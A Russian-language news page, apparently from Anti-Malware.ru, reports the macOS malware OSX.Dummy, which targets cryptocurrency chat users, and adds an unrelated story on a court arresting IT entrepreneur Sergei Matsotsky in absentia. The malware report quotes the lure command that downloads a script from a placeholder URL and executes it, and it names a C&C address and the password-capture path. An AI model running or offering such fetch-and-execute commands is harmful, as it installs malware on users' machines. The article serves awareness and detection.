Новый вредонос для macOS атакует криптовалютное сообщество

Новый вредонос для macOS атакует криптовалютное сообщество

Новый вредонос для macOS атакует криптовалютное сообщество

Известный исследователь в области безопасности Патрик Уордл проанализировал новую вредоносную программу для систем macOS, которая атакует криптовалютное сообщество. Вредонос получил имя OSX.Dummy.

«Мне удалось зафиксировать несколько атак на пользователей macOS, они брали свое начало в чатах Slack или Discord, в которых общалось криптовалютное сообщество. В этих чатах люди делятся небольшими сниппетами, чем и воспользовались злоумышленники — вредоносный бинарник загружается и выполняется на компьютерах ничего не подозревающих жертв», — объясняет Ремко Верхов, обнаруживший OSX.Dummy эксперт.

Верхоф уточнил, что люди, маскирующиеся под администраторов групповых чатов, делились небольшими фрагментами кода, который приводил к загрузке и выполнению вредоносной программы. Пример такого фрагмента:

$ cd /tmp && curl -s curl $MALICIOUS_URL > script && chmod +x script && ./script

Уордл отметил, что вредоносный двоичный файл не подписан, это значит, что он будет заблокирован GateKeeper, однако атакующие обошли это ограничение, заставляя жертв загружать и выполнять вредоносный код напрямую с помощью команд терминала.

OSX.Dummy пытается присвоить своему файлу права root, выполнив sudo-команду, однако это потребует от пользователя ввода пароля в терминале. Пароль сохраняется вредоносным кодом в папке /tmp/dumpdummy.

Затем зловред выполняет ряд операций, которые обеспечивают ему укоренение в системе и последующий автоматический запуск.

Вредоносный код также пытается подключиться к C&C-серверу 185[.]243.115.230, используя порт 1337. Если подключение проходит успешно, злоумышленник сможет выполнять команды с root-привилегиями.

«Чтобы првоерить свою систему на предмет заражения этим вредоносом, запустите KnockKnock от root. Ищите неподписанный элемент запуска com.startup.plist, выполняющий нечто с именем «script.sh»», — заключил Уордл.

AM LiveПодписывайтесь на канал "AM Live" в Telegram, чтобы первыми узнавать о главных событиях и предстоящих мероприятиях по информационной безопасности.

Басманный суд заочно арестовал Сергея Мацоцкого по делу о взятке

Басманный суд Москвы заочно арестовал одного из основателей компании IBS, бывшего члена совета директоров Альфа-банка и «Вымпелкома» Сергея Мацоцкого. Решение принято по ходатайству следствия в рамках уголовного дела о даче взятки в особо крупном размере.

Об этом сообщил «Интерфакс». Подробности уголовного дела официально не раскрываются. По оценке телеграм-канала Mash, Мацоцкому может грозить до 15 лет лишения свободы.

«Постановлением Басманного районного суда города Москвы удовлетворено ходатайство органов предварительного расследования об избрании меры пресечения в виде заключения под стражу в отношении Мацоцкого Сергея Савельевича, обвиняемого в совершении преступлений, предусмотренных ч. 5 ст. 291 УК РФ, меру пресечения в виде заключения под стражу на срок 2 месяца с момента его экстрадиции на территорию Российской Федерации либо с момента его задержания на территории Российской Федерации», — говорится в официальном сообщении судов общей юрисдикции Москвы.

Сергей Мацоцкий — один из основателей ИТ-интегратора IBS. В 2020 году он покинул компанию и создал инвестиционный холдинг «ГС-Инвест». Мацоцкого называют одной из влиятельных фигур в российской ИТ-отрасли. Его состояние оценивается в 14,5 млрд рублей.

AM LiveПодписывайтесь на канал "AM Live" в Telegram, чтобы первыми узнавать о главных событиях и предстоящих мероприятиях по информационной безопасности.

RSS: Новости на портале Anti-Malware.ru